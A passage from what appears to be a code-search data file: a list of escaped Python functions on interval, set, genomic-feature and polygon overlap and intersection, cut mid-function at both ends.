index = int(new_coord_list.index(pos)) \n if pos[0]=='S':\n ct+=1\n if ct==2:\n spos=pos[1]\n if pos[0]=='E':\n ct-=1\n if ct==1:\n if not spos==pos[1]:\n #print spos, '-', pos[1], 'overlap'\n ovl.append(('ovl', spos, pos[1])) # add to overlap vector the positions that overlap\n #print 'overlap found! :', [str(spos),str(pos[1]),'ovl']\n #print 'removing ', new_coord_list[index]\n del new_coord_list[index]\n #print 'removing', new_coord_list[index-1]\n del new_coord_list[index-1]\n \n # \n new_coord_list.sort(key = lambda x : x[0], reverse = True)\n start=0\n end = 0\n two_hist_away_from_cent_of_peak = 0\n two_hist_away_list = []\n for nc_pos in new_coord_list:\n if nc_pos[0]=='S':\n if (start<=two_hist_away_from_cent_of_peak) and (two_hist_away_from_cent_of_peak !=0) and (end!=0): \n #if center_of_peak <= two_hist_away_from_cent_of_peak and (two_hist_away_from_cent_of_peak !=0):\n two_hist_away_list.append('-'.join([str(start),str(end), 'tha']))\n start= nc_pos[1]\n if nc_pos[0]=='E':\n end = nc_pos[1]\n center_of_peak= (start+nc_pos[1])/2\n two_hist_away_from_cent_of_peak = center_of_peak + 300\n # print 'new_coord_list: ', new_coord_list\n return ovl, new_coord_list", "def overlap(component1, component2):\n if component1[0].start <= component2[0].stop and component2[0].start <= component1[0].stop:\n if component1[1].start <= component2[1].stop and component2[1].start <= component1[1].stop:\n return True\n return False", "def overlaps(*objs):\n return set.intersection(*(set(range(*extent(obj))) for obj in objs))", "def get_inter_cds_regions(annotations):\n # Determine locations of inter-CDS regions for each chromosome\n inter_cds_regions = {}\n\n for chr_id, chromosome in annotations.items():\n # get chromosome dimensions (the first feature represents the\n # chromosome itself)\n ch_end = int(chromosome.features[0].location.end)\n\n # filter out everything except for genes\n genes = [x for x in chromosome.features if x.type == 'gene']\n\n # order by position along chromosome\n genes.sort(key=lambda x: x.location.start)\n\n # add range before first gene\n start = 0\n\n # keep track of strand of polycistronic transcriptional unit\n strand = None\n\n inter_cds_regions[chr_id] = {\n -1: [],\n +1: []\n }\n\n # iterate through genes and store the ranges between them;\n # for TriTrypDB files, the gene boundaries are generally the same\n # as the CDS boundaries.\n for gene in genes:\n # Determine location for the region up to start of the gene\n end = int(gene.location.start)\n\n # Skip over snoRNAs, etc. that are nested inside of other genes\n # For example: TcCLB TcChr22-2 179,000:180,000\n if end <= start:\n continue\n\n # Add CDS to relevant list based on strand\n if strand is None:\n # Left-most gene\n inter_cds_regions[chr_id][gene.location.strand].append((start, end))\n elif strand != gene.location.strand:\n # Add ORFs in both directions at transcription switch sites (TSSs)\n inter_cds_regions[chr_id][+1].append((start, end))\n inter_cds_regions[chr_id][-1].append((start, end))\n else:\n # Within PTU; look for ORFs on same strand\n inter_cds_regions[chr_id][strand].append((start, end))\n\n # update start counter and strand\n start = int(gene.location.end)\n strand = gene.location.strand\n\n # add region after last gene\n inter_cds_regions[chr_id][strand].append((start, ch_end))\n\n return inter_cds_regions", "def findOverlap( columns, t, minOverlap ):\n for c in columns:\n c.setOverlap() # defaults to 0.0\n for s in c.getConnectedSynapses():\n c.setOverlap( c.getOverlap() + s.getSourcetInput( t ) )\n\n if c.getOverlap() < minOverlap:\n c.setOverlap()\n else:\n c.boostOverlap()", "def calc_overlap(self, start, stop):\n\n overlaps = []\n for s in self.map:\n e = self.map[s]\n if s >= start or s <= stop:\n # We found an overlap\n if e <= stop:\n overlaps.append({\"start\": s, \"stop\": e})\n else:\n overlaps.append({\"start\": s, \"stop\": stop})\n elif e >= start or e <= stop:\n if s >= start:\n overlaps.append({\"start\": s, \"stop\": e})\n else:\n overlaps.append({\"start\": start, \"stop\": e})\n return overlaps", "def _overlap(c1, c2, index='dice'):\n set1 = set(c1)\n set2 = set(c2)\n intersection_num = float(len(set1 & set2))\n try:\n if index == 'dice':\n total_num = len(set1 | set2) + intersection_num\n overlap = 2.0 * intersection_num / total_num\n elif index == 'percent':\n overlap = 1.0 * intersection_num / len(set1)\n else:\n raise Exception(\"Only support 'dice' and 'percent' as overlap indices at present.\")\n except ZeroDivisionError as e:\n print(e)\n overlap = np.nan\n return overlap", "def overlap(start_idx1, end_idx1, start_idx2, end_idx2):\n head = min(end_idx1, end_idx2)\n tail = max(start_idx1, start_idx2)\n return head >= tail", "def overlapping_atoms(cifs):\n errors = []\n\n # catch pymatgen warnings for overlapping atoms\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n for cif in cifs:\n try:\n s = CifParser(cif).get_structures(primitive=True)[0]\n assert s.is_ordered\n except (ValueError,AssertionError) as exc:\n s = CifParser(cif, occupancy_tolerance=1000).get_structures(primitive=True)[0]\n s.to(filename=cif)\n print(f'Fixed overlapping atoms in {cif}')\n except Exception as exc:\n errors.append(f'Unable to parse file {cif}')\n \n if errors:\n print('\\n'.join(errors))\n sys.exit(1)", "def find_overlap_range_list(points_list):\n highest_start_point = points_list[0][0]\n lowest_end_point = points_list[0][0] + points_list[0][1]\n\n for point in points_list[1:]:\n highest_start_point = max(highest_start_point, point[0])\n lowest_end_point = min(lowest_end_point, point[1]+point[0])\n\n if lowest_end_point <= highest_start_point:\n return None\n\n return [highest_start_point, lowest_end_point - highest_start_point]", "def exon_context(exon, start, stop):\n assert start and stop\n exon = exon.split('\\t')\n start = start.split('\\t')\n stop = stop.split('\\t')\n assert len(exon) == 9 and len(start) == 9 and len(stop) == 9\n\n hasstart = feat_overlap(exon, start)\n hasstop = feat_overlap(exon, stop)\n if hasstart or hasstop:\n if hasstart and hasstop:\n return 'complete'\n elif hasstart:\n return 'start'\n else:\n assert hasstop\n return 'stop'\n\n exonstart = int(exon[3])\n exonend = int(exon[4])\n codonnucs = [start[3], start[4], stop[3], stop[4]]\n codonnucs = [int(x) for x in codonnucs]\n leftmostnuc = min(codonnucs)\n rightmostnuc = max(codonnucs)\n if exonend < leftmostnuc:\n if exon[6] == '-':\n return '3putr'\n else:\n return '5putr'\n elif exonstart > rightmostnuc:\n if exon[6] == '-':\n return '5putr'\n else:\n return '3putr'\n else:\n assert exonstart > leftmostnuc and exonend < rightmostnuc\n return 'cds'", "def dates_intervals_are_overlapped(start_1, end_1, start_2, end_2):\n return end_1 >= start_2 and end_2 >= start_1", "def report_exon_overlap(strand1, exons1, strand2, exons2):\n #print(strand1)\n #print(exons1)\n #print(exons2)\n exons1 = convert_2dlst_to_set(exons1)\n first_exon1, last_exon1 = return_first_and_last_exon(exons1)\n exons2 = convert_2dlst_to_set(exons2)\n first_exon2, last_exon2 = return_first_and_last_exon(exons2)\n \n dct_report = dict()\n if not first_exon1 == first_exon2:\n \"\"\" first exon of isoseq and annotated-gene-model are not exactly the same \"\"\"\n if str(first_exon1).split(\".\")[1] == str(first_exon2).split(\".\")[1]:\n \"\"\" if first intron-start boundary is the same \"\"\"\n if int(str(first_exon1).split(\".\")[0]) > int(str(first_exon2).split(\".\")[0]):\n \"\"\" if isoseq first exon is shorter \"\"\"\n if strand1 == \"+\":\n dct_report[5] = \"partial_inside\"\n else:\n dct_report[3] = \"partial_inside\"\n else:\n \"\"\" if isoseq first exon is longer \"\"\"\n if strand1 == \"+\":\n dct_report[5] = \"partial_outside\"\n else:\n dct_report[3] = \"partial_outside\"\n else:\n if strand1 == \"+\":\n dct_report[5] = \"different\"\n else:\n dct_report[3] = \"different\"\n else:\n if strand1 == \"+\":\n dct_report[5] = \"same\"\n else:\n dct_report[3] = \"same\"\n\n if not last_exon1 == last_exon2:\n \"\"\" last exon of isoseq and annotated-gene-model are not exactly the same \"\"\"\n if str(last_exon1).split(\".\")[0] == str(last_exon2).split(\".\")[0]:\n \"\"\" if last intron-end boundary is the same \"\"\"\n if int(str(last_exon1).split(\".\")[1]) < int(str(last_exon2).split(\".\")[1]):\n \"\"\" if isoseq first exon is shorter \"\"\"\n if strand1 == \"+\":\n dct_report[3] = \"partial_inside\"\n else:\n dct_report[5] = \"partial_inside\"\n else:\n \"\"\" if isoseq first exon is longer \"\"\"\n if strand1 == \"+\":\n dct_report[3] = \"partial_outside\"\n else:\n dct_report[5] = \"partial_outside\"\n else:\n if strand1 == \"+\":\n dct_report[3] = \"different\"\n else:\n dct_report[5] = \"different\" \n else:\n if strand1 == \"+\":\n dct_report[3] = \"same\"\n else:\n dct_report[5] = \"same\"\n return(dct_report[5], dct_report[3])", "def calculate_overlaps(drives, dist_tol, time_tol):\n \n for i1 in range(len(drives)-1):\n d1 = drives[i1]\n \n for i2 in range(i1+1, len(drives)):\n d2 = drives[i2]\n \n #stop trying if d1 ends more than time_tol before d2 starts\n #note that drives are chronologically ordered\n if d2.coords[0].time - d1.coords[-1].time > time_tol:\n break\n \n overlap = ol.compute_overlap(d1, d2, dist_tol, time_tol)\n if overlap:\n ol1 = ol.Overlap(d1, d2, overlap[0], overlap[1])\n d1.append_overlap(ol1)\n ol2 = ol.Overlap(d2, d1, overlap[2], overlap[3])\n d2.append_overlap(ol2)", "def find_overlapping_segments(pos, seg, columns):\n seg = seg.sort_values(['start', 'end'])\n\n if seg.duplicated(['start', 'end']).any():\n raise ValueError('duplicate columns')\n\n start_idx = np.searchsorted(seg['start'].values, pos['coord'].values) - 1\n end_idx = np.searchsorted(seg['end'].values, pos['coord'].values)\n\n mask = (start_idx == end_idx)\n\n results = pos.copy()\n\n for col in columns:\n results[col] = np.nan\n results.loc[mask, col] = seg[col].iloc[end_idx[mask]].values\n\n return results", "def overlapping_atoms(cifs):\n messages = []\n\n for cif in cifs:\n try:\n atoms = io.read(cif)\n except Exception as exc:\n raise ValueError(f'Unable to parse file {cif}') from exc\n overlaps = geometry.get_duplicate_atoms(atoms, cutoff=0.1)\n if len(overlaps) != 0:\n messages.append(f'Overlapping atoms detected in {cif}')\n \n if messages:\n print(messages)\n sys.exit(1)\n\n print('No overlapping atoms found.')", "def arglocs_overlap(*args):\n return _ida_hexrays.arglocs_overlap(*args)", "def exon_finder(tstart,tend,strand,qstart,qend,qlen,qstartphase,qendphase,seqdict,seqname,\n max_offset = 30, is_start = False, is_stop = False, nevermind_atg = False,\n cluster = None,exon_number = None,log_file = open(os.devnull, 'w'),full_pseudoexon_search = True,\n exon_info_dict = False):\n start = None\n end = None\n pseudo = False\n max_coord = len(seqdict[seqname]) - 1\n if strand == \"+\":\n phasestart_offset = (3 - qstartphase) % 3\n phasestop_offset = qendphase\n start_match_offset, stop_match_offset = 3 * (qstart - 1),3 * (qlen - qend)\n elif strand == '-':\n phasestart_offset = qendphase\n phasestop_offset = (3 - qstartphase) % 3\n start_match_offset, stop_match_offset = 3 * (qlen - qend), 3 * qstart\n ideal_start = tstart - phasestart_offset - start_match_offset\n ideal_end = tend + stop_match_offset + phasestop_offset\n pseudo_start = tstart - phasestart_offset\n pseudo_end = tend + phasestop_offset\n gc_start, gc_end = None, None\n for offset in range(0,max_offset + 3,3):\n if start:\n break\n for direction in [1,-1]:\n test_start = ideal_start - offset * direction\n test_seq = genome.Sequence(seqdict[seqname][test_start-1 + phasestart_offset:tend])\n if strand == \"-\":\n test_seq = test_seq.reverse_compliment()\n if not test_seq.translate():\n continue\n elif is_stop and strand == \"-\":\n if ideal_start - 1 < test_start < pseudo_start:\n pseudo_start = test_start\n lastcodon = seqdict[seqname][test_start - 1:test_start + 2]\n if lastcodon.upper() in ['TTA','TCA','CTA'] and test_seq.translate().count('*') == 1:\n start = test_start\n break\n elif not \"*\" in test_seq.translate():\n if ideal_start - 1 < test_start < pseudo_start:\n pseudo_start = test_start\n if is_start and strand == '+':\n if nevermind_atg:\n start = test_start\n break\n else:\n firstcodon = seqdict[seqname][test_start - 1:test_start + 2]\n if firstcodon.upper() == \"ATG\":\n start = test_start\n break\n else:\n splicesite = seqdict[seqname][test_start-3:test_start-1]\n if (strand == '+' and splicesite.upper() == \"AG\") or (strand == '-' and splicesite.upper() == \"AC\"):\n start = test_start\n break\n elif strand == '-' and splicesite.upper() == \"GC\" and not gc_start:\n gc_start = test_start\n if not start:\n if gc_start:\n start = gc_start\n else:\n pseudo = \"P\"\n start = pseudo_start\n for offset in range(0,max_offset + 3,3):\n if end:\n break\n for direction in [-1,1]:\n test_end = ideal_end - offset * direction\n if test_end - start < 3:\n break\n test_seq = genome.Sequence(seqdict[seqname][start - 1 + phasestart_offset:test_end - phasestop_offset])\n if strand == \"-\":\n test_seq = test_seq.reverse_compliment()\n if not test_seq.translate():\n continue\n elif is_stop and strand == \"+\":\n if ideal_end + 1 > test_end > pseudo_end:\n pseudo_end = test_end\n lastcodon = seqdict[seqname][test_end - 3:test_end]\n if lastcodon.upper() in ['TAA','TGA','TAG'] and test_seq.translate().count('*') == 1:\n end = test_end\n break\n elif not \"*\" in test_seq.translate() or (is_stop and not \"*\" in test_seq.translate()[:-1]):\n if ideal_end + 1 > test_end > pseudo_end:\n pseudo_end = test_end\n if is_start and strand == '-':\n if nevermind_atg:\n end = test_end\n break\n else:\n firstcodon = seqdict[seqname][test_end - 3:test_end]\n if firstcodon.upper() == \"CAT\":\n end = test_end\n break\n else:\n splicesite = seqdict[seqname][test_end:test_end + 2]\n if (strand == '+' and splicesite.upper() == \"GT\") or (strand == '-' and splicesite.upper() == \"CT\"):\n end = test_end\n break\n elif strand == \"+\" and splicesite.upper() == \"GC\" and not gc_end:\n gc_end = test_end\n if not end:\n if gc_end:\n end = gc_end\n else:\n pseudo = \"P\"\n end = pseudo_end\n start = max([1,start])\n end = min([end,max_coord])\n if pseudo and full_pseudoexon_search and cluster != None and exon_number != None and exon_info_dict:\n gwexons = genewisesearch(seqdict[seqname],qstartphase,qendphase,strand,\n exon_info_dict[str(cluster) + ':' + str(exon_number)][6], \n search_coords = [ideal_start - 3 - max_offset,ideal_end + 3 + max_offset],\n seqname = seqname,log_file=log_file)\n if gwexons != []:\n return gwexons\n return [[start,end,pseudo]]", "def overlapping(x,y):\n for i in range(0,len(x)):\n for j in range(0,len(y)):\n if x[i] == y[j]:\n return True\n else:\n continue#reapet until finished all number in the list\n return False", "def contiguousInds(args):\n condition = (np.array(args) > 0.0)\n\n # Find the indicies of changes in ``condition``\n dd = np.diff(condition)\n idx, = dd.nonzero()\n\n # Start things after change in ``condition``, thus shift indices 1 rightward\n idx += 1\n\n # If the start is True prepend a 0\n if condition[0]: idx = np.r_[0, idx]\n\n # If the end is True, append the length of the array\n if condition[-1]: idx = np.r_[idx, condition.size]\n\n # Reshape the result into two columns\n idx.shape = (-1, 2)\n\n # Find lengths of each contiguous segment\n sizes = np.diff(idx, axis=1)\n # Find the location of maximum segment length\n maxPos = np.argmax(sizes)\n # Make indices spanning longest segment\n inds = np.arange(*idx[maxPos])\n\n return inds", "def get_overlaps(file_name):\r\n\r\n place = {}\r\n size = {}\r\n sap = {}\r\n overlapping = []\r\n active_list = []\r\n max_width = 0\r\n\r\n with open(file_name + \".scl\") as f:\r\n for i, line in enumerate(f):\r\n\r\n line = line.strip()\r\n if line:\r\n if line.split()[0] == \"Sitespacing\":\r\n sitespacing = line.split()[2]\r\n if line.split()[0] == \"SubrowOrigin\":\r\n starting_x = line.split()[2]\r\n ending_x = int(starting_x) + int(sitespacing) * int(line.split()[5])\r\n if ending_x > max_width:\r\n max_width = ending_x\r\n\r\n divider = max_width // 10\r\n\r\n with open(file_name + \".nodes\") as f:\r\n for i, line in enumerate(f):\r\n\r\n line = line.strip()\r\n if line:\r\n if re.match(r'[a-z]{1}[0-9]+', line.split()[0]):\r\n if len(line.split()) == 3:\r\n size[line.split()[0]] = [line.split()[1], line.split()[2]]\r\n\r\n with open(file_name + \".pl\") as f:\r\n for i, line in enumerate(f):\r\n\r\n line = line.strip()\r\n if line:\r\n if re.match(r'[a-z]{1}[0-9]+', line.split()[0]):\r\n if line.split()[0] in size:\r\n place[line.split()[0]] = [line.split()[1], line.split()[2]]\r\n sap_num = int(line.split()[1]) // divider\r\n if sap_num not in sap.keys():\r\n sap[sap_num] = []\r\n sap[sap_num].append([line.split()[0], int(line.split()[1]),\r\n int(line.split()[1]) + int(size[line.split()[0]][0]), int(line.split()[2]),\r\n \"start\"])\r\n\r\n sap[sap_num].append([line.split()[0], int(line.split()[1]),\r\n int(line.split()[1]) + int(size[line.split()[0]][0]),\r\n int(line.split()[2]) + int(size[line.split()[0]][1]), \"end\"])\r\n\r\n for lista in sap.values():\r\n lista.sort(key=lambda x: x[3])\r\n lista.sort(key=lambda x: x[4], reverse=True)\r\n for element in lista:\r\n if element[4] == \"start\":\r\n if len(active_list) == 0:\r\n active_list.append(element[0])\r\n else:\r\n for node in active_list:\r\n if int(place[node][0]) < int(place[element[0]][0]) + int(size[element[0]][0]) \\\r\n and int(place[node][0]) + int(size[node][0]) > int(place[element[0]][0]) \\\r\n and int(place[node][1]) < int(place[element[0]][1]) + int(size[element[0]][1]) \\\r\n and int(place[node][1]) + int(size[node][1]) > int(place[element[0]][1]):\r\n overlap = (node, element[0])\r\n overlapping.append(overlap)\r\n active_list.append(element[0])\r\n else:\r\n active_list.remove(element[0])\r\n return overlapping", "def overlap(annotations1, annotations2):\n return [val for val in annotations1 if val in annotations2]", "def __listintersect(self, c1, c2):\n s2 = {}\n for delta in c2:\n s2[delta] = 1\n\n\tc = []\n\tfor delta in c1:\n if s2.has_key(delta):\n\t\tc.append(delta)\n\n\treturn c", "def find_conn_CXCY(atom, atom_list):\n le_list = []\n for element in identify_bonds(atom, atom_list):\n if ((element[0].atom_name == \"CX\") or (element[0].atom_name == \"CY\")):\n if (atom.z - element[0].z > 0):\n le_list.append([element[0], 1])\n else:\n le_list.append([element[0], -1])\n return le_list", "def findOverlapOrNearest(gs, ts, tree, start, end):\n #step 1, find overlaps\n rs = set()\n for i in range(start, end + 1):\n if i in gs:\n rs.add(gs[i])\n if len(rs) > 0:\n rs = list(rs)\n return rs, [0] * len(rs)\n #find the nearest one\n else:\n d, i = tree.query([(start + end) / 2], k=1)\n g = gs[ts[i][0]]\n #d = ts[i][0] - (start+end)/2\n d = int(d)\n return [g], [d]", "def get_exons(chromStart, chromEnd, blockSizes, blockStarts):\n blockSizes = [int(i) for i in blockSizes.split(\",\") if not i == \"\" ]\n blockStarts = [int(i) for i in blockStarts.split(\",\") if not i == \"\" ]\n n = len(blockSizes)\n exons = []\n #print(\"block: \" + str(n))\n #print(blockSizes, blockStarts)\n for i in range(n):\n #print(i)\n blockStart = blockStarts[i]\n blockSize = blockSizes[i]\n exonStart = chromStart + blockStart\n exonEnd = exonStart + blockSize\n exons.append([exonStart, exonEnd])\n return(exons)", "def intersect_or_on(s1, s2, c1, c2):\n den = float( (c2.y - c1.y) * (s2.x - s1.x) - (c2.x - c1.x) * (s2.y - s1.y) )\n if not den:\n return None\n\n us = ((c2.x - c1.x) * (s1.y - c1.y) - (c2.y - c1.y) * (s1.x - c1.x)) / den\n uc = ((s2.x - s1.x) * (s1.y - c1.y) - (s2.y - s1.y) * (s1.x - c1.x)) / den\n\n if (0 <= us <= 1) and (0 <= uc <= 1):\n #subj and clip line intersect eachother somewhere in the middle\n #this includes the possibility of degenerates (edge intersections)\n x = s1.x + us * (s2.x - s1.x)\n y = s1.y + us * (s2.y - s1.y)\n return (x, y), us, uc\n else:\n return None", "def overlap(start1, end1, start2, end2):\n return not (end1 < start2 or end2 < start1)", "def intersect(list1, list2):\n #iterative, not recursive\n intersect_list = []\n outer_list = []\n inner_list = []\n len_list1 = len(list1)\n len_list2 = len(list2)\n start_outer = 0\n start_inner = 0\n inner_start = 0\n if len_list1 <= len_list2:\n outer_list = list1\n inner_list = list2\n else:\n outer_list = list2\n inner_list = list1\n end_outer = len(outer_list)\n end_inner = len(inner_list)\n if DEBUG_I:\n print \"end_inner\", end_inner\n print \"end_outer\", end_outer\n \"\"\"\n Method 2\n #Somehow worse efficiency than index(item)\n for item in outer_list:\n for dummy_idx in range(start_inner, end_inner):\n if item == inner_list[dummy_idx]:\n intersect_list.append(item)\n if DEBUG_I:\n print \"updating start_inner:\",dummy_idx\n start_inner = dummy_idx\n \n #Method 1\n #Not terrible efficiency, not amazingly bad\n for item in outer_list:\n if item in inner_list:\n inner_start = inner_list.index(item)\n intersect_list.append(item)\n \n #Method 3 - am best\n for item in outer_list:\n if item in inner_list[start_inner:]:\n intersect_list.append(item)\n start_inner = inner_list.index(item)\n if DEBUG_I:\n print \"updating start_inner:\", start_inner \n\n #Method 4, am try to use generator \n for item in outer_list:\n for dummy_idx in gen_range(start_inner, end_inner):\n if item == inner_list[dummy_idx]:\n intersect_list.append(item)\n if DEBUG_I:\n print \"updating start_inner:\",dummy_idx\n start_inner = dummy_idx\n \n #Method 5 - try to break on find\n for item in outer_list:\n for dummy_idx in range(start_inner, end_inner):\n if item == inner_list[dummy_idx]:\n intersect_list.append(item)\n if DEBUG_I:\n print \"updating start_inner:\",dummy_idx\n start_inner = dummy_idx\n break \n \"\"\"\n #Method 6 - dict\n #outer_dict = {entry: entry for entry in outer_list}\n outer_dict = {}\n for entry in outer_list:\n outer_dict[entry] = entry\n for entry in inner_list:\n if entry in outer_dict:\n intersect_list.append(entry)\n \n return intersect_list", "def find_endpoints(batch_trajectories):\n # empty lists to fill\n site_lats = []\n site_lons = []\n last_lats = []\n last_lons = []\n lats_150 = []\n lons_150 = [] \n last_times = []\n times_150 = []\n last_sst = []\n sst_150 = []\n \n # temporary lists as placeholders\n temp_site_lats = []\n temp_site_lons = []\n temp_lats = []\n temp_lons = []\n temp_lats150 = []\n temp_lons150 = []\n temp_times = []\n temp_times150 = []\n temp_sst = []\n temp_sst150 = []\n\n for speed in range(len(batch_trajectories)):\n # working with one speed at a time means working with one nc file at\n # a time\n \n # reset temporary lists\n temp_site_lats = []\n temp_site_lons = []\n temp_lats = []\n temp_lons = []\n temp_lats150 = []\n temp_lons150 = []\n temp_times = []\n temp_times150 = []\n temp_sst = []\n temp_sst150 = []\n\n # extract variables into lists\n lats = batch_trajectories[speed].variables['lat'][:]\n lons = batch_trajectories[speed].variables['lon'][:]\n lats150 = batch_trajectories[speed].variables['lat150'][:]\n lons150 = batch_trajectories[speed].variables['lon150'][:]\n times = batch_trajectories[speed].variables['time'][:]\n ssts = batch_trajectories[speed].variables['temp'][:]\n ssts_150 = batch_trajectories[speed].variables['temp150'][:]\n\n # if a particle is deleted before time is up, values are masked. \n # We'd like to get the last valid number.\n for trajectory in range(len(lats)):\n i = -1 # index for the last value\n while np.ma.is_masked(lats[trajectory][i]) is True:\n i -= 1 # if the value is masked, go to one value sooner\n \n j = i # use j for the 150m values\n while lats150[trajectory][j] > 0:\n # we want the first index where the latitude is recorded.\n # j is actually the last one where it's not recorded, so we\n # extract the information at index j+1\n j -= 1\n\n # once i and j are determined for a trajectory, we can extract the\n # variables and append them to temporary lists.\n temp_site_lats.append(lats[trajectory][0])\n temp_site_lons.append(lons[trajectory][0])\n temp_lats.append(lats[trajectory][i])\n temp_lons.append(lons[trajectory][i])\n temp_lats150.append(lats150[trajectory][j+1])\n temp_lons150.append(lons150[trajectory][j+1])\n temp_times.append(times[trajectory][i])\n temp_sst.append(ssts[trajectory][i])\n temp_sst150.append(ssts_150[trajectory][j+1])\n temp_times150.append(times[trajectory][j+1])\n \n # after the temporary lists are appended by sinking speed, they\n # are appended to the big lists that are returned by the function.\n # this keeps the structure of being separated by sinking speed.\n site_lats.append(temp_site_lats)\n site_lons.append(temp_site_lons)\n last_lats.append(temp_lats)\n last_lons.append(temp_lons)\n lats_150.append(temp_lats150)\n lons_150.append(temp_lons150)\n last_times.append(temp_times)\n times_150.append(temp_times150)\n last_sst.append(temp_sst)\n sst_150.append(temp_sst150)\n \n return site_lats, site_lons, last_lats, last_lons, lats_150, lons_150,\\\n last_times, times_150, last_sst, sst_150", "def overlap(t1start, t1end, t2start, t2end):\n\n return (t1start <= t2start <= t1end) or (t2start <= t1start <= t2end)", "def get_staining_overlap(chrom, guide_cutsites, cytogenic_bands):\n\n guide_stains_overlap = []\n if str(chrom) in cytogenic_bands:\n for location in cytogenic_bands[chrom]:\n if guide_cutsites[0] >= location[0] and guide_cutsites[0] < location[1]:\n guide_stains_overlap.append(location[2])\n elif guide_cutsites[-1] >= location[0] and guide_cutsites[-1] < location[1]:\n guide_stains_overlap.append(location[2])\n else:\n print(chrom + \" not found in cytogenic bands file\")\n print(cytogenic_bands.keys())\n\n if guide_stains_overlap:\n return \",\".join(guide_stains_overlap)\n else:\n return ''", "def find_intersections(wire_data):\n # Build a set of course points for each wire\n tracks = [build_track(wire) for wire in wire_data]\n\n # Find the intersection of the two lists\n intersections = list(set(tracks[0]) & set(tracks[1]))\n return intersections", "def clip(self, clip, s_entry, c_entry):\n\n # detect clip mode\n unionmode = not s_entry and not c_entry\n intersectionmode = s_entry and c_entry\n differencemode = not s_entry and c_entry\n\n # prep by removing repeat of startpoint at end\n first = self.first\n last = first.prev\n if last.x == first.x and last.y == first.y:\n first.prev = last.prev\n last.prev.next = first\n first = clip.first\n last = first.prev\n if last.x == first.x and last.y == first.y:\n first.prev = last.prev\n last.prev.next = first\n\n # TODO: maybe also remove repeat points anywhere?\n # ...\n \n # phase one - find intersections\n # ------------------------------\n anyintersection = False\n s_intsecs = []\n c_intsecs = []\n for s in self.iter(): # for each vertex Si of subject polygon do\n for c in clip.iter(): # for each vertex Cj of clip polygon do\n try:\n #print \"find isect %s - %s and %s - %s\" %(s.xy, self.next(s.next).xy, c.xy, clip.next(c.next).xy )\n i, alphaS, alphaC = intersect_or_on(s, self.next(s.__next__),\n c, clip.next(c.__next__))\n \n iS = Vertex(i, alphaS, intersect=True, entry=False)\n iC = Vertex(i, alphaC, intersect=True, entry=False)\n\n iS.neighbour = iC\n iC.neighbour = iS\n \n s_intsecs.append( (iS, alphaS, s, self.next(s.__next__)) )\n c_intsecs.append( (iC, alphaC, c, clip.next(c.__next__)) )\n \n anyintersection = True\n \n except TypeError:\n pass # this simply means intersect() returned None\n\n # insert intersections into originals\n for iS,a,s,s_next in reversed(s_intsecs):\n if a == 0:\n self.replace(s, iS)\n elif a == 1:\n self.replace(s_next, iS)\n else:\n self.insert(iS, s, s_next)\n for iC,a,c,c_next in reversed(c_intsecs):\n if a == 0:\n self.replace(c, iC)\n elif a == 1:\n self.replace(c_next, iC)\n else:\n clip.insert(iC, c, c_next)\n\n #print \"testing if insert was done correctly\"\n for s in self.iter():\n #print s\n pass\n #print \"and\"\n for c in clip.iter():\n #print c\n pass\n \n\n # phase one and a half - no intersections between subject and clip, so correctly return results\n # --------------------\n def specialcase_insidetest():\n resultpolys = []\n if unionmode: # union\n if clip.first.isInside(self):\n # clip polygon is entirely inside subject, so just return subject shell\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n elif self.first.isInside(clip):\n # subject polygon is entirely inside clip, so just return clip shell\n clipped = Polygon()\n for c in clip.iter():\n clipped.add(Vertex(c))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n else:\n #clip polygon is entirely outside subject, so return both\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n clipped = Polygon()\n for c in clip.iter():\n clipped.add(Vertex(c))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n elif intersectionmode: # intersection\n if clip.first.isInside(self):\n # clip polygon is entirely inside subject, so the intersection is only the clip polygon\n clipped = Polygon()\n for c in clip.iter():\n clipped.add(Vertex(c))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n elif self.first.isInside(clip):\n # subject polygon is entirely inside clip, so the intersection is only the subject polygon\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n else:\n #clip polygon is entirely outside subject, so no intersection to return\n pass\n elif differencemode: # difference\n if clip.first.isInside(self):\n # clip polygon is entirely inside subject, so the difference is subject with clip as a hole\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n hole = Polygon()\n for c in clip.iter():\n hole.add(Vertex(c))\n polytuple = (clipped, [hole])\n resultpolys.append(polytuple)\n elif self.first.isInside(clip):\n # subject polygon is entirely inside clip, so there is no difference\n pass\n else:\n #clip polygon is entirely outside subject, so difference is simply the subject\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n # no need to continue so just return result\n return resultpolys\n \n if not anyintersection: \n return specialcase_insidetest()\n\n\n\n\n\n\n\n # phase two - identify entry/exit points\n # --------------------------------------\n\n # From K&K\n \n def mark_flags(poly, c, c_entry):\n \"c and c_entry are not actually the clip, can be for both s and c, just too lazy to change.\"\n #print \"intersection\"\n #print \"\\t\",c\n # intersection is degenerate, is the start/endpoint of a line\n # so maybe delete intersection flag based on prev/next locations\n prevloc = testLocation(c.prev, poly)\n nextloc = testLocation(c.__next__, poly)\n if prevloc == \"on\" or nextloc == \"on\":\n prevmid = Vertex(((c.x+c.prev.x)/2.0,(c.y+c.prev.y)/2.0))\n prevloc = testLocation(prevmid, poly)\n nextmid = Vertex(((c.x+c.next.x)/2.0,(c.y+c.next.y)/2.0))\n nextloc = testLocation(nextmid, poly)\n if prevloc == \"in\" or nextloc == \"in\":\n poly.anyinside = True\n #print \"\\t %s -> degenintsec -> %s\" %(prevloc,nextloc)\n if prevloc == \"out\":\n if nextloc == \"out\":\n #just touching\n c.entry = \"en/ex\" if c_entry else \"ex/en\"\n elif nextloc == \"in\":\n c.entry = \"en\" if c_entry else \"ex\"\n elif nextloc == \"on\":\n c.entry = \"en\" if c_entry else \"ex\"\n elif prevloc == \"in\":\n #union and difference should never go inside the other polygon\n #so this should only happen for intersectmode...\n if nextloc == \"in\":\n #just touching\n c.entry = \"ex/en\" if c_entry else \"en/ex\"\n elif nextloc == \"out\":\n c.entry = \"ex\" if c_entry else \"en\"\n elif 